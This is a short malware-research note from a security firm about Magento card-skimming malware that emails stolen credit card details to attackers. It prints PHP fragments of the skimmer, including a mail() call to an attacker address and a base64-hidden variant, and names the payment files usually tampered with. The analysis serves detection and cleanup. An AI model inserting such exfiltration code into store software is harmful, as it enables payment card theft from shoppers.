Magento Malware Emails Stolen Credit Card Details to Hackers

  • October 9, 2015
Labs Note

We regularly find malware that tries to steal client credit card details from Magento sites. Hackers use a few tricks and slightly modify their code from time to time.

For example, we’ve seen multiple modifications of the code reported in this article. Instead of using HTTP requests to send data to their own site, hackers often just email the stolen data to their emails.

...
mail("tuyulaustrali@yahoo.com","$data10 From $data6|$data15", "$message");

To hide the email address they use the following modification:

...
$idkey = 'Y3NfdG9vbHM0dXNAeWFob28uY29t';
$name ="$data9 Payment";
$encode = base64_decode($idkey);
...
mail($encode, $salt, $payfull, $headr);

where Y3NfdG9vbHM0dXNAeWFob28uY29t decodes to cs_tools4us@yahoo.com

Regardless of the actual code, the best way to mitigate this issue is preserve integrity of Magento core files. The files hackers usually modify are:

app/code/core/Mage/Payment/Model/Method/Cc.php
includes/src/Mage_Payment_Model_Method_Cc.php

Of course, removing the malicious code is not enough. You should find and close security holes to prevent reinfections.

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Related Tags
Related Categories
You May Also Like